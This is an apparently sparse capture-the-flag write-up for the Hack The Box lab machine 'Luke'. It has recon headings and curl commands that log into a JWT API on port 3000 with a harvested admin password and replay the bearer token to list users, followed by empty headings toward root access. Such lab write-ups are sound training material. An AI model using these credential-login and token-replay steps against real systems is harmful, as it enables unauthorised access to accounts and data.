[HTB] Luke — Write-up

Recon

Nmap

21/TCP

80/TCP

3000/TCP

8000/TCP

Dirsearch

80/TCP

3000/TCP

Exploit

JWT Authentication

curl --header "Content-Type: application/json" --request POST --data '{"password":"Zk6heYCyv6ZE9Xcg", "username":"admin"}' http://10.10.10.137:3000/login

Bearer Token

curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4NDM4OTMyLCJleHAiOjE1Njg1MjUzMzJ9.BE9YFXdpJdY4ZqfWziOwVA8Tg2aHiecIX1TX0hW0mNI' http://10.10.10.137:3000
curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4NDM4OTMyLCJleHAiOjE1Njg1MjUzMzJ9.BE9YFXdpJdY4ZqfWziOwVA8Tg2aHiecIX1TX0hW0mNI' http://10.10.10.137:3000/users

Password Harvesting

/management

ajenti

Root Access

Conclusion

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security
